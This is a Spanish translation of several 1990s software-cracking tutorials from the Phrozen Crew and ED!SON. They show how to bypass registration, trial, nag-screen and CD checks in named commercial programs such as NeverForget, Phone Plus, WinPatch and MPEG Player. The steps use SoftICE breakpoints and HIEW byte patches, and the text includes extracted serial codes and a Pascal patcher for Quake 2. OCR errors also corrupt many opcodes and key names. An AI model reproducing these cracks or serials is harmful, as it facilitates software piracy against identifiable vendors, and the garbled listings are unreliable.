Ahora que? No vamos a pagar por esto...! El programa registra el nombre 
y codigo en el registro en la entrada HKCUSoftwarelMJTNETTrayRun Settings. 


Step 15. Regresa a W32Dasm y abre otra vez SDR, Busca: "RegC" (Recuerdas donde 
has visto esto antese? Lo has visto en la direccion 42E6C0. 
Ahora haz doble click sobre "RegC". 


Step 16. Cierra la ventana SDR, con lo que veras: 


* Possible StringData Ref from Code Ob] ->"RegC" 


:004309EC BA9C0B4300 mov edx, 00430B9C 
:004309F1 8BC3 mov eax, ebx 


:00430A0C 833DD426430000 cmp dword ptr [004326D4], 00000000 <---- Codigo de registro! 
:00430A 13 750D jne 00430422 
:00430A 15 833DD826430000 cmp dword ptr [004326D38], 00000000 


:00430A1C 0F84E0000000 je 00430B02 <---- Si no, salta a mal chico 
* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00430A 13(C) 

:00430A22 A194264300 mov eax, dword ptr [00432694] 


Step 17. Ahora piensa, 430B02 es demasiado lejano para saltar desde 430A1C, 
Crees que para ir al Buen chico, saltaras tan lejos, yo creo que no. 
Mira la direccion 430B02: 


:00430B02 A1A0264300 mov eax, dword ptr [004326A0] 
:00430B07 E8S6C04FFFF call 00420F78 

:00430B26 E8C928FDFF call 004033F4 

:00430B2B C3 ret 


Has visto que 430B02 esta cercano a 430B2B (le dice regresar amtes de 
de llamar a este procedimiento) Por lo tanto no podria saltar 

lo que normalmente se hace es buscar la ultima comparacion anterior 

a la orden RET 


Step 18. Busquemos y encontremos esto: 


:00430ADC 740C je 00430AEA <---- si es, saltamos al buen chico 

:00430ADE A1A0264300 mov eax, dword ptr [004326A0] 

:00430AE3 E89004FFFF call 00420F78 

:00430AE8 EB22 jmp 00430B0C <---- saltamos a mal chico (la parte final) 

* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

[:00430ADC(C) 

:00430AEA A19C264300 mov eax, dword ptr [0043269C] 

:00430AEF 8B80E0010000 mov eax, dword ptr [eax+000001E0] 

:00430AF5 8B15D4264300 mov edx, dword ptr [004326D4] <---- Codigo de registro! 


Sabemos que tenemos que modificar la direccion 430ADC. 
Pon la barra verde en 00430ADC 740C y deberias ver esto Offset 
0002FEDCh. Donde podemos parchear TRAYRUN.EXE. 


Step 19. Regresa a WC, corre HIEW TRAYRUN.EXE, F4,F5 y 2FEDC. 
Deberias ver: 


0002FEDC: 740C je  00002FEEA — ---------- (1) 
0002FEDE: A1A0264300 mov  eax,[0004326A0] 
0002FEE3: ES9004FFFF call 000020378 ---------- (2) 
0002FEE3: EB22 jmps 00002FFOC =--------- (3) 
0002FEEA: A19C264300 mov  eax,[00043269C] 


son los bytes que puedes cambiar, pulsa F3, luego EB y actualiza con F9 
Step 20. Corre TRAYRUN.EXE.. No se muestra la NAG, pulsa en About y esta registrado :-) 
PART 5: Codigo fuente en pascal de tKC/PC '98 
Uses Crt; 


Const A: Array[1..1] of Record (<-------- 1 bytes para parchear] 
A : Longint; 
B : Byte; 
End = 
((A:528436;B:SEB)); [<--------------- el offset "28436" y el byte "EB" seran cambiado) 


Var Ch:Char; 
I:Byte; 
F:File; 
EN:file of byte; 
Size:longint; 


Begin 
Writeln(Little Patch');writeln(Crack for Quake 2 3.10 by tKC/PC "98”); 
Assign(F'QUAKE2.EXE'); ( <----=--------- archivo a parchear) 


[SI-] Reset(F, 1); (SI+) 
If IOResult <> O then 
begin 
writeln("File not found!”); 
halt(); 
end; 
For l:=1 to 1 do [<-> 4 bytes para parchear] 
Begin 
Seek(F,A[I].A); 
Ch:=Char(A[I].B); 
Blockwrite(F,Ch, 1); 
End; 
Writeln(File successfully patched!'); 
End. 


ULTIMAS PALABRAS 


Espero que hayas disfrutado............ 
Agradecimientos......... 

Enjoy it, 

The Keyboard Caper, 


The Founder of PhRoZeN CReW '94-98 
2-2-1998 


Traducido el 7-2-00 por Muñoz! 


tKC Cracking Tutorial (Lesson 7) 
Bienvenido al tutorial F7! 


Muchos newbees me han pedido continuar escribiendo tutores. 
Espero que te guste 


En este tutor aprenderas mas sobre W32Dasm y Softlce. Gracias a dios por el 
nuevo superPC! :-) 


CONTENIDOS: 


1) Como remover el chequeo de CD en Balls of Steel 1.1 
Usando W32Dasm. 
URL: http://www.pinfllwizards.com/bosdownload.html 


2) Como remover la NAG y los 30 dias de limite en NeverForget 1.00 
Usando W32Dasm. 
URL: http://www.neverforget.com/trial.html 


3) Como registrarse en Phone Plus 2.00 
Usando Softlce. 


URL: http://www.aros.net/-impulse 


4) Como registrar WinPatch 1.0.06 
Usando Softlce. 
URL: http://www.artistry.com/products/winpatch/wp.exe 


5) Pequeño Sumario 
6) Mis ultimas palabras 


HERRAMIENTAS 


W32Dasm 8.9 - http://www .fortunecity.com/bally/waterford/18/w32dsm89.zip 
Hacker's View 5.66 - ftp://ftp.cdrom.com/.27/sac/utilprog/hiew366.zip 


FAR 1.50 - ftp://rwntug.quarta.msk.ru/WinUtil/Rar/far150.exe 
o Windows Commander 3.51 - http://www.ghisler.com 


PART 1: Como remover el chequeo del CD en Balls of Steel 1.1 
P1. Corre BOS.EXE 


P2. Veras que tienes que insertar el cd para jugar. Ok no hay problema 
apunta el mensaje de erro "Please insert the Balls of Steel CD and click..." 


P3. Ok, sal del programa 


P4. Corre WC, ve al directorio BOS 


PS. Copia BOS.EXE como BOS.EXX, y copia BOS.EXE a BOS.W32 
P6. Corre W32Dasm y desensambla BOS.W32 


P7. Una vez hecho esto, pulsa en STRING DATA REFERENCE, y busca 
"Please insert the Balls of Steel..” haz doble click 


PS. Cierra la ventana SDR,deberias ver: 
:00439882 B9F4984300 mov ecx, 004398F4 
* Possible StringData Ref from Code Obj ->"Please insert the Balls of Steel " 


P9. Ok, Vamos a averiguar que llama a este procedimiento. Hmm, deberiamos 
regresar al inicio de este 


P10. Pulsas PgUp un par de veces hasta que encuentres 


* Referenced by a CALL at Address: 
1:004399D5  <--- que es esto? 


:004397A4 55 push ebp 
:004397A5 8BEC mov ebp, esp 


P11. Ok, vamos a encontrar que llama a este procedimiento. Es referenciado 
por una llamada en 4399D5! Pulsa en Goto Code Location, y entra 4399D5. 


P12. Ah! Encontramos aqui la llamada 
:004399D5 ESCAFDFFFF call 004397A4 


P13. Hmm, vamos a "nopear" (perdon por el termino) la llamada y a ver que ocurre. 
Pon la barra verde en 
:004399D5 ESCAFDFFFE call 00439744 
y deberias ver este (VDOffset 00038DD5h. Donde parchear el BOS.exe 


P14. Regresa a WC, inicia HIEW BOS.EXE, pulsa F4, FS y 38DDS. 
deberias ver 


00038DD5: ESCAFDFFFF call 000038BA4 ---------- (1) 
00038DDA: E8D1FBFEFFF call 0000389B0  ---------- (2) 
00038DDF: 8BOB mov  ecx,[ebx] 
00038DD5: ESCAFDFFFF call 000038BA4 ---------- (1) 
00038DDA: E8D1FBFFFF call 0000389B0  ---------- (2) 
00038DDF: 8BOB mov  ecx,[ebx] 


P15. Pulsa F3, entra 9090909090 y presiona F9 para actualizar 
el BOS.EXE. Sal de HIEW. 


P16. Corre BOS.EXE, funciona? *heeyaa* pues lo has hecho!! 


PARTE 2: Como remover la NAG y el limite de 30 dias en NeverForget 1.00 


P1. Core NeverForget.EXE 


P2. Veras la NAG, Molesta, verdad? Ok, no problem, Escribe el mensaje de error 
"Demo version 1.00 installed on.." 


P3. Ok, sal del programa 

P4. Corre WC, ve al directorio NeverForget 

PS. Copia NeverForget.EXE a NeverForget.EXX, y copia NeverForget.EXE como NeverForget.W32 
P6. Corre W32Dasm y desensambla NeverForget.W32 


P7. Ahora pulsa sobre STRING DATA REFERENCE, busca el mensaje "Demo version " 
y haz click sobre el 


PS. Cierra la ventana SDR, debeiras ver: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00408D55(C) <--- Que es esto? 


* Possible StringData Ref from Data Obj ->"Demo version " 


P9. Ok, vamos a averiguar que salta a este procedimiento. Es referenciado 
por una llamada en at 408D55! Haz click en Goto Code Location, y entra 
408D55. 


P10. Encontramos el salto aqui: 


:00408D55 0F84F30B0000 je 0040994E 
:00408D3B 53 push ebx 
:00408D3C 53 push ebx 


P11. Ok, miramos abajo, encontraremos tambien una verificacion del tiempo 
("Will expire soon”), Pero si evitamos este salto donde iremos. Aqui: 


:00408E2B 53 push ebx 


P12. Este podria ser el fin de la verificacion del tiempo. Vamos a 
averiguar que ocurre si saltamos a esta direccion. Asegurate que la barra 
de color cyan esta en :00408E2B 53 push ebx 
y veras el Offset 0000822Bh. Recuerdalo. y regresa a la direccion 408D55 
, este offset deberia ser 8155h, verdad? 


P13. Ok, regresa a WC, corre HIEW NEVERF-1.EXE, F4, FS y entra 8155. 


Veras: 
00008155: 0F84F30B0000 je  000008D4E  ---------- (1) 
0000815B: 53 push ebx 


P14. Pulsa F3, luego TAB, entra "¡mp 822B" y presionas ESC. Debes ver: 
00008155: E9D 1000000 jmp 00000822B 


P15. Actualiza con F9 NEVERF-1.EXE. Sal de HIEW. 


P16. Corre NeverForget.EXE. Ni expira ni mierdas de NAGs, Lo has hecho!! 
PARTE 3: Como registrar Phone Plus 2.00 
P1. Corre Phone.EXE 


P2. Veras la NAG, es una mierda molesta, no? Ok, no problem, 
pulsa en "Enter Registration Code.." 


P3. Pulsa CTRL-D para romper en Softice. 

P4. Teclea BPPX GETWINDOWTEXTA y presiona FS, regresaras a PhonePlus. 

PS. Entra "tKC/PC '98" como nombre y "12345" como codigo, pulsa OK. 

P6. Regresaras al Softice, teclea D EAX, veras "12345" en la ventana de datos 

P7. Hmm, no.. pulsa ES, teclea D EAX, ah encontraras "tKC/PC '98" en la ventana de datos 


PS. Pulsa F11 para situarte donde se llama a esta funcion. Veras 
EAX=00000004 en la ventana de registros? Es la longitud de tu nombre 
Intenta poner ? A y obtines 10) 


P9. Sabemos que estamos en el lugar correcto. Traza hacia abajo (F10) hasta ver 
015F:7C69D80F POP EDI 


P10. Teclea D ECX y veras tambien nuestro nombre en la ventana de datos. 
Sigue trazando hasta obtener lo siguiente: 


015F:0040EC61 CALL 0040ECBA 


P11. Ya sabemos que es la ultima comparacion antes del mensaje de error. Necesitamos 
meternos en esta funcion. Pulsa FS para trazar el call. 


P12. Sigue trazando hasta que veas: 
015F:7C681D37 MOV ESLECX 
P13. Teclea D EAX y que es lo que ves en la Ventana de datos? nuestro serial 
P14. pon BD* pulsa FS regresa a PhonePlus. 
P15. Entra "1P3201795" *boom* Registrado!! 
PARTE 4: Como registrar el WinPatch 1.0.06 
P1. Corre WinPatch.EXE 
P2. Veras la nag. haz click en "Enter Registration Code.." 
P3. Pulsa CTRL-D para ir al Softice. 


P4. Teclea BPPX GETWINDOWTEXTA y luego ES regresaras al WinPatch. 


PS. Entra "The Keyboard Caper" como nombre, como ID "12345" y compañia 
"Phrozen Crew '98". Despues pulsa en OK. 


P6. Regresas al Softice, pulsa D EAX, veras nuestro nombre en la ventana 
de datos (VD) 


P7. Hmm, no.. pulsa ES, teclea D EAX, econtraras "12345" en la VD, 
No esta listo todavia. 


P8. FS de nuevo. tipea D EAX *boom* nuestra organizacion en VD. 
Estamos listos para comenzar 


P9. Pulsa F11 para obtener donde se llama a la funcion. Ved EAX=00000010 
en la ventana de registros (VR a partir de ahora)? Es la longitud de 
nuestra organizacion (si pones ? 10 obtendras 16) 


P10. Sabemos que estamos en el lugar correcto. Traza hacia abajo (con F10) 
hasta que veas 


015F:0040F2A1 PUSH EDX 
015F:0040F2A2 PUSH EAX 
015F:0040F2A3 CALL 00416B50 


P11. Ahora sabemos que esta es la ultima llamada antes de que emerja el mensaje 
de error. Vamos a intentarlo, pon D EAX y que es lo que ves en la VD? 
*nuestra ID* 


P12. Pon BD* y presiona F5 para regresar a WinPatch. 
P13. Entra "D“L-1121-1941-3638" *boom* Registrados! ! 
PART 5: Pequeño sumario 


Una vez que has cargado Softice, no puedes desactivarlo hasta que 

reinicies el ordenador. para comprobar que Sl esta cargado pulsa 

CTRL-D. Deberia aperecer la pantalla de SI. Para regresar al windows, pulsa 
X (para salir) o G (ir a), o ES. 


Para obtener la ayuda, usamos H o Fl. 


Para trazar a traves del codigo T o F8. 
PAra trazar sin entrar en los calls P o F10. 


Poner breakpoints, usamos BPX <funcion> ej. BPPX GETWINDOWTEXTA o BPX GETDLGITEMTEXTA. 
Ver la lista de breakpoints; BL. 

Borrar todos los breakpoints, BC*,para el primero bcO el segundo bcl.... 

Activar Breakpoints, BEO o BE* (depende si es uno o todos) 

Desactivar breakpoints, BDO o BD* 

Ir al interior de una funcion, usamos F]11. 


En el proximo tutorial te enseñare mas detalles acerca del Softice. 


ULTIMAS PALABRAS 


Saludos, agradecimientos, etc.... 


Enjoy it, 

The Keyboard Caper, 

The Founder of PhRoZeN CReW '94-98 
7-3-1998 


Traducido por Muñoz! 7 -2 -00 


Tutorial de Cracking de Tkc n* 8 

Bienvenidos 

Aqui estamos de nuevo. ¿Muchos Newbees? Bueno, no es un 
gran probleam... 

Esto encantado de que a la gente le guste el estilo de 


estas lecciones 


En este numero te enseñare todo mucho mas acerca de 
W32Dasm y Softlce. Sin conocimiento, no hay poder!. 


Vamos!! 
CONTENIDOS: 


1) Como desbloquear CaptureEze97 6.0 
Usando Softlce. 
URL: http://www.screencapture.com/c97setup.exe 


2) Como registrarse en MPEG Player 1.76 
Usando Softlce. 
URL: ftp://ftp.simtel.net/pub/simtelnet/win95/mmedia/mpegp176.zip 


3) Como registrar el WinXFiles 2.8 
Usando Softlce y W32Dasm. 


URL: http://www .pepsoft.com/wxf32_28.zip 


4) Como registrarse en CD-R Diagnostic 0.1.1.3 
Usando el SoftIce. 
URL: http://www.enteract.com/-pcrowley/windows/cdrdiagver113.exe 


5) Consejos para Softlce 

6) Ultimas palabras 

HERRAMIENTAS: 

Necesitaras las siguientes, que son las que yo uso 

W32Dasm 8.9 - http://www.fortunecity.com/bally/waterford/18/w32dsm89.zip 
Hacker's View 5.66 - ftp://ftp.cdrom.com/.27/sac/utilprog/hiew366.zip 


FAR 1.50 - ftp://rwntug.quarta.msk.ru/WinUtil/Rar/far150.exe 
oel Windows Commander 3.51 - http://www.ghisler.com 


Aqui encontraras poderosas herramientas: 
http://cracking.home.ml.org 


Asegurate de obtenerlas todas para el siguiente tutor!! 


PARTE 1: Como desbloquear CaptureEze97 6.0 


BTW: Una vez el programa ha sido desbloqueado, todavia estamos en el modo de evaluacion, trial, 
, solo es eliminado el limite de tiempo. 
Tendrias que pedir el programa completo. pero vamos alla 


P1. Corre CAPEZE97.EXE 


P2. Veras un mensaje en el que se te advierte que te quedan 45 dias. 
Ok, no hay problema, pulsa en el boton Purchase 
Entra como nombre "tKC", como compañia "PC '98" y el codigo 
de desbloqueo "12345" 


P3. Pulsa CTRL-D para comenzar el Softice. 
P4. Teclea BPPX GETWINDOWTEXTA y presiona FS para regresar al CAPEZE. 
PS. Pulsa OK, y regresaras al Softice, pulsa FS. 


P6. Puedes pulsar F11 si quieres, pero esto te llevara a tener 
que trazar durante largo rato, por lo tanto es mejor 
pulsar FS de nuevo y luego F11 para obtener a la funcion que llama 


P7. Veras en la VR EAX=000000067 Es la longitud de nuestra compañia 
Sabemos que estamos cerca. Vamos a ver que pasa: 


PS. Empieza a trazar, con F10, hasta que veas: 


015F:00633FC1 LEA EAX,[EBP-14] P11<---nuestro codigo falso 
015F:00633FC4 LEA ECX,[EBP-28] P11<---nuestro codigo bueno 
015F:00633FC7 PUSH EAX 

015F:00633FC8 PUSH ECX 


P9. Ahora pon D EAX. Ves "12345" en la Ventana de Datos (VD)? Ok bien. 
P10. Teclea D ECX. Que ves en la VD? *Nuestro codigo* 

P11. Teclea BD* y pulsa FS para regresar al CAPEZE. 

P12. Entra "4422028906994041" *Desbloqueado!* 


P13. Si no lo quieres desbloquear, puedes encontrar un codigo 
para restaurar la version trial, de evaluacion, pulsando 
F10 hasta que veas: 


015F:00634034 LEA EAX,[EBP-14] 
015F:00634037 LEA ECX,[EBP-28] 
015F:0063403A PUSH EAX 
015F:0063403B PUSH ECX 


P14. Entra D ECX y encontraras un codigo que registre el periodo de evaluacion. 
Nuestro codigo puede ser diferente, depende del nombre que entraste la primera vez!) 


PARTE 2: Como registrarse en MPEG Player 1.76 


P1. Corre MPEGP32.EXE 


P2. Veras una de esas asquerosas NAG's. pero no hay problema 
pulsa en About/Registration. 


P3. Entra "tKC/PC '98" como nombre de usuario y como codigo 
de usuario "12345" 


P4. Pulsa CTRL-D para ir a Softice. 


PS. Pon un breakpoint en GETDLGITEMTEXTA y presiona FS 
con lo que regresaras a MPEGP32. 


P6. Pulsa en Register y rompeas en medio de Softice, pulsa 
ES 


P7. Ahora presiona F11 para ir a la funcion que nos llama. 
¿Ves EAX=00000005 en la Ventana de Registro (VR)? 
Es facil averiguar que es esto. la longitud de nuestro 
codigo 


PS. Ok, ahora deberias ver: 


015F:0040A161 PUSH 00449140 
015F:0040A166 PUSH 0043CCC0 


P9. Pon D 449140 y deberias ver "12345" en la VD. 
Tambien teclea D 43CCCO0 para ver nuestro nombre 


P10. Ok, presiona F10 hasta que veas: 
015F:0040A16B CALL 0040E6D0 


P11. Necesitamos ir al interior de esta llamada por que 
es la ultima llamada antes de que salga el mensaje 
de error. Pulsa FS para ir al interior del call. 


P12. Traza (F10) hasta que veas esto: 


015F:0040E75D MOV ESI,[ESP+0C] 
015F:0040E761 MOV EDI [ESP+10] 
015F:0040E765 LEA EDX,[ESP+0C] 


P13. Que es lo que obtenemos. Veremos ESI=13EE3B42 
y EDI=BE096ACF en VR. Hemos metido un codigo malo. 
Pulsa F10 hasta ver 


015F:0040E79F LEA EAX,[ESP+0000010C] 
015F:0040E7A6 MOV DL,[EAX] 


P14. Teclea D EAX y que ves en la VD? *EL CODIGO* 


P15. Teclea ahora BD* y pulsa FS para regresar a MPEGP32. 


P16. Entra "13ee3b42-be096acf" *boom* Registrados!! 
PARTE 3: Como registrarse en WinXFiles 2.8 


BTW: Este programa esta escrito en Delphi, y algunas 
veces usa sus propias rutinas y funciones. Usaremos 
el W32Dasm y el Softice para obtener el codigo. 


P1. Corre WXFILES.EXE 


P2. Pulsa sobre Register, mete el nombre "tKC/PC '98" 
y como serial "12345" 


P3. Pulsa CTRL-D para entrar en Softice, Pon 
BPX GETWINDOWTEXTA y tambien BPX GETDLGITEMTEXTA. 


P4. Pulsa FS para regresar a WXFILES, y haz click en OK. 


PS. Hmm, no ha ocurrido nada. Delphi no usa estos 
metodos para obtener cadenas (Dios sabe porque amo 
Delphi! Ok, no es un gran problema, abre W32Dasm y 
desensambla WXFILES.EXE. 


P6. Una vez se haya desensamblado el ejecutable pulsa sobre 
STRING DATA REFERENCE, y busca este mensaje: 
"Invalid Registration Password” , ahora pulsa sobre el 


P7. Cierra la ventana SDR, deberias ver: 


:00482A1A 668B0ODAC2A4800 mov cx, word ptr [00482AAC] 
:00482A21 B202 mov dl, 02 


* Possible StringData Ref from Code Obj ->"Invalid Registration Password." 


PS. Pulsa un PgUp hasta que veas esto: 


:00482990 8D95D4FBFFFF lea edx, dword ptr [ebp+FFFFFBDA4] 
:00482996 8B45FC mov eax, dword ptr [ebp-04] 

:004829C8 754E jne 00482A18 *P11<---salta si el codigo es malo 
:004829CA 8B45FC mov eax, dword ptr [ebp-04] 


P9. Ok, Tenemos la direccion (482990) y usaremos 
esto con el Softice. Cierra W32Dasm. 


P10. Regresa a WXFILES, mete tu nombre y codigo de nuevo 
pero antes de aceptar haz lo siguiente 


P11. CTRL-D para ir a Softice, pon 
BPX SHOWWINDOW y FS. Ya puedes pulsar en Ok 


P12. *boom* Ahora estas en Softice. Ok, 
pon G 482990 (no necesitas pulsar FS!) Regresaras 
a WXFILES. Entra el codigo, y haz click en OK de nuevo 


P13. *boom* Apareceras en Soft Ice debido al comandp 
G (ET=x.xx seconds). 


P14. Desactiva los bpr con BD* y pulsa F10 hasta que veas: 
015F:004829AB LEA EAX,[EBP+FFFFFBD8] 

P15. Teclea D EAX y vemos en la VD "12345". 

P16. F10, hasta que llegues a: 
015F:0048290C2 POP EAX 

P17. Pon D EDX y ¿que es lo que ves en VD?... 

P18. Regresa a WXFILES. 

P19. Entra MCGBVPFMWBAMYXQ *boom* Registrado!! 

PARTE 4: Como registrar el CD-R Diagnostic 0.1.1.3 

P1. Corre CORDIAG.EXE 


P2. Una de esas asquerosas NAGS. Ok, no problem, 
pulsa sobre Help/Registration. 


P3. Entra "tKC/PC '98" como nombre y como codigo 
"12345". 


P4. Entra en Softice. 
PS. Pon un bpr en GETDLGITEMTEXTA y regresa al CDRDIAG. 
P6. Pulsa Ok, con lo que volvemos al Softice. 


P7. Presiona F11 para ir a la rutina que nos llama. 
Ves en la VR EAX=000000057 Seguro que sabes lo que es... 
la longitud de nuestro codigo 


PS. Ok, deberias ver: 

015F:00408AC0 MOV DL,[0041B640] 

P9. Teclea D 41B640 y veras "12345" en VD 
P10. Ok, pulsa F10 y para cuando veas esto: 
015F:00408B26 ADD ESP,04 


P11. En la VR deberias ver EAX=0000204C 


P12. Teclea ? EAX y obtendremos: 
0000204C 0000008268 " L" 


P13. Que es esto que vemos? 8268 es una parte para nuestro codigo de 4 digitos 
El programa toma los primeros digitos como 82 y el ultimo debe ser 
68, veamos un ejemplo para entenderlo 


D 

Digitos: 1234 
Codigo: 8268 

2) 

Digitos: 123456 
Codigo: 828268 

3) 

Digitos: 12345678 
Codigo: 82828268 


P14. Nuestro codigo deberia ser 82828268. Vamos a desactivar los bpr asi pulsa BD* 
y luego ES para regresar al programa 


P15. Entra "82828268" *boom* Registrados!! 
PART 5: Consejos para el Softice 


Aqui estan algunas de las funciones que usaremos cuando crackeamos 
programas 


Lectura/Escritura de Archivos: 


ReadHFile 
WriteFile 
CreateFileA 


Leer datos de archivos INI: 


GetPrivateProfileStringA 
GetPrivateProfilelntA 
WritePrivateProfileStringA 
WritePrivateProfilelntA 


Acceso al Registro: 


RegCreateKeyA 
RegDeleteKeyA 
RegQueryValueA 
RegCloseKeyA 
RegOpenKeyA 


DialogBoxes (obtener texto de mensajes): 


GetWindowTextA 
GetDlgltemTextA 
GetDlgltemInt 


MessageBoxes (Mensajes de error): 


MessageBox 
MessageBoxA 
MessageBoxExA 
MessageBeep 


Tiempo y fecha: 


GetLocal Time 
GetSystemTime 


Obtener fechas de archivos 
GetFileTime 
Crear ventanas (como NAG's): 


Create WindowExA 
ShowWindow 


Gracias a THE_q por los consejos 

ULTIMAS PALABRAS: 

Realmente espero que hayas disfrutado tanto como yo... 
Unas sabias palabras que un dia dijo alguien 


If you give a person a crack, 

he will be hungry again. 

If you teach a person to crack, 
he will never be hungry again! 
(Si le das un crack a alguien, 
El estara hambriento de nuevo. 
Si enseñas a crackear a alguien, 
El nunca mas tendra hambre!) 


Sin conocimientos no hay poder!) 


Agradecimienots a 
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Puedes encontrarme en F*pc98 o tkcOreaper.org 


Disfruta 
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Traducido por Muñoz! el 8-2-00 


NOTA: ED!SON no es un cracker de PC pero el tutorial es 
muy bueno para los. ED!SON es miembro de United Cracking Force 


Tutorial para el cracking en Windows v1.o 


1. Introduccion al crack en Windows 
2. Rapida introduccion a SoftICE/Win 2.00 


3. Encontrando codigos de registro 

3.1 Task Lock 3.00 - Registro por un solo numero de proteccion 

3.2 Command Line 95 - Facil registro por y name/code 

4, Haciendo un keymaker, generador de codigos, parar Command Line 95 
5. PUSH, CALL y cosas que usa el programa cuando llama a una funcion 
6. Sobre los programas de Visual Basic 


APENDICE 


A. Hacer load symbols con Softlce 
B. Sintaxis para las funciones 

C. Donde obtener el software 

D. Contactando conmigo 


1. INTRODUCCION Al CRACK EN WINDOWS 


Crackear un programa en Windows es, a menudo, mas facil que hacerlo con 
uno que corre en Dos. En Windows, es dificil ocultar algo de alguien que busca 
informacion, siempre y cuando se usen funciones propias de este. 


La primera (y a menudo unica) herramienta que necesitas es SoftICE/Win 2.00 
(En la actualidad van por la version 4),un poderosisimo debugge de Numega 
Algunas personas encuentras dificil su uso, pero te dire como hacer eficaz 

el debugging con esta herramienta, espero que me entendais :-) 


He hecho un Apendice (A) con informacion que deberias leer acerca del SoftICE/Win 2.00 
Nunca he tenido problemas instalando SoftICE, por lo tanto, si los tienes 

tendras que refererirte al manual. 

Las direcciones con todo el software que necesitas en el apendice C. 


- ED!SON, edison Eccnux.utm.my 


2. QUICK INTRODUCTION TO SOFTICE/WIN 2.00 


| Registros | Usa'R' para editarlo 


Otras teclas importantese (en la configuracion por defecto del teclado) 
'H'/Fl  - Ayuda On-line 
FS/Ctr+D - Correr 


FS - Traza funciones entrando en los calls 
F10 - Traza funciones sin entrar en los calls 
F11  - Para saber quien llama una funcion 


3. ENCONTRANDO CODIGOS DE REGISTROS 


Este es probablemente el camino mas facil para practicar y aprende, 
conseguir un programa Shareware e intentar registrarlo 


3.1 Task Lock 3.00 - Proteccion por un simple n” de registro 


Simplemente, un codigo. 


3.1.1 Examinando el programa 


Esta hecho para 16 o 32 bits? Donde puedo entrar la informacion de registro?. 
Usar la ayuda da muchas pista de como trabaja el registro. Ve y buscala antes de empezar 


....Deberias estar comprobandolo!...Lo estas comprobando?...Lo has comprobado?... 
OK, Ya sabes que es una aplicacion para win953 de 32-bits, y que puedes registrar 

el programa entrando un simple numero de registro en una DialogBox, en una ventana 
que aparece cuando seleccionamos Register|Register...". Tambien sabes, al haber leido 
la ayuda que hay dos tipos de registro:licencia individual y local 

Lo mas probable es que haya dos verificaciones del codigo 


3.1.2 Trampa en la rutina de codigo 


El codigo normalmente es introducido en Ventanas. Para verificarlo el 
programa debe leer los contenidos de esas cajas con una de estas funciones: 


16-bit 32-bit 
GetWindowText GetWindowTextA, GetWindowTextW 
GetDlgltemText GetDlgltemTextA, GetDlgltemTextW 


La ultima letra de las funciones de 32 bits dice si se usan cadenas de un byte 
o dos bytes, esto ultimo es algo raro. 

Quiza hallas tenido la idea de "Si pudiera romper en GetWindowText" 

claro que puedes. Pero primero debes estar seguro que esos symbolos son 


cargados por Softlce (apendice a) 


Para poner una trampa(Realmente se llama breakpoint, un punto de ruptura en ejecucion) 
en SoftICE, primero debes entrar en el debugger, usando Ctrl+D, 

luego usamos el commando BPX seguido por el nombre de una funcion o una direccion 
de memoria. Y como Task Lock es una aplicacion de 32-bits vamos a ponerle 

un breakpoint en GetWindowTextA. Si esto no funciona, podemos probar con otro bpx. 
Escribe en el Softlce 


:bpx getwindowtexta 


Si obtienes un mensaje de error como "No LDT", asegurate que no estas corriendo 
otra aplicacion de fondo. He notado que el Norton Commander/Dos 
molesta a esta funcion. Para saber si tiens puesto otro breakpoint puedes 
poner 
:b] * 


Esto deberia dar algo como esto: 
00) BPX USER32!GetWindowTextA C=01 


Sal del SOFTICE, con Ctrl+D o F5 


Bien, has puesto un breakpoint que atrapara cualquier llamada a la funcion 
GetWindowTextA. Ahora vamos a meter cualquier numero par registrar al programa 
y pulsamos OK... Sale un estupido mensaje de error diciendote que el codigo 
entrado es erroneo. Entonces intentemoslo con un breakpoint en 
GetDlgltemTextA. Primero borra el viejo breakpoint (Bp a partir de ahora): 

:bc 0 
(0 quiere decir el n* de bp en la lista que obtines con bl, puedes usar 
tambien *) 


Y pon uno nuevo asi: 
:bpx getdlgitemtexta 


Volvamos a intentarlo 


3.1.3 En el interior del debugger 


Wow! Esto funciona! Estamos en el interior del SoftICE, 

En el lugar donde comienza la funcion GetDlgltemTextA. 

Para saltar al sitio en que se llama esta funcion pulsa F11. 

Estas dentro de SGLSET.EXE, si no estas seguroe, mira que en la linea 
entre el la ventana de codigos y la de comandos ves algo comoesto 


Puedes desactivar el breakpoint haciendo: 
:bd 0 


Para activarlo, si lo quieres volver a poner: 
:be 0 


En la primera linea en la ventana de la linea de codigos aparece algo como 
CALL  [USER32!GetDlgltemTextA] 


Para ver las lineas anteriores pulsa Ctrl+Up unas pocas veces. 
Por si no sabes ensamblador te pongo unos cuantos comentarios a las lineas 


RET ; Fin de la function 
PUSH EBP ; Inicio de la function 


MOV EBP, ESP qe 
SUB ESP, 0000009C Ds 


PUSH ESI po 
> LEA  EAX, [EBP-34] ; EAX = EBP-34 
PUSH EDI da 
MOVE ESI, ECX DS 
PUSH 32 ; Salvar: Maximo tamaño de la cadena 
> PUSH EAX ; Salvar: Direccion del buffer de texto 
PUSH 000003F4 ; Salvar: Identificadores de control 
PUSH DWORD PTR [ESI+1C] ; Salvar: Manejo de la caja de dialogos 


CALL  [USER32!GetDlgltemTextA] ; Obtenemos el texto 


El commando PUSH salva los valores para usarlos despues. He marcado las 
lineas importantes con el caracter '>. 
Sabemos que la direccion del buffer de texto esta almacenada en EAX 
y que EAX era EBP-34. Veamos que hay en EBP-34: 
:d ebp-34 


Deberias keer el codigo que has metido si miras en la VD 

Tenemos que buscar un lugar donde nuestro codigo es comparado con otros. 
Vamos a pasar a traves del programa con Fl10 hasta encontrar algo sobre 
EBP-34.. Hasta que veas esto 


> LEA  EAX, [EBP+FFFFFF64] ; EAX = EBP-9C 
LEA  ECX, [EBP-34] ; ECX = EBP-34 
PUSH EAX ; Salvar: EAX 
PUSH ECX ; Salvar: ECX 

> CALL  00403DDO ; Llama a una funcion 
ADD ESP, 08 ; Borra informacion salvada 
TEST EAX,EAX ; verifica la funcion 
JINZ  00402BCO ; Salta si no es 0 


Para mi lo mas importante es la funcion de comparacion de cadenas 
* Entran 2 cadenas, regresa si es igual a O, lo contrario si no es O 


Y porque deberia comprobar que una cadena es igual que otra? 
Para ver si es valido!(te lo Imaginabas, no?) 


Bien, que se oculta detras de [EBP+FFFFFF64] SoftICE no trabaja muy 


bien con numeros negaativos, para encontrar el valor real hace el siguiente calculo: 


100000000 - FFFFFF64 = 9C 


Puedes hacer el calculo en SoftICE asi: 
:2 0-FFFFFF64 


El numero 100000000 es demasiado grande para SoftICE, pero por otro lado 
da el mismo resultado 


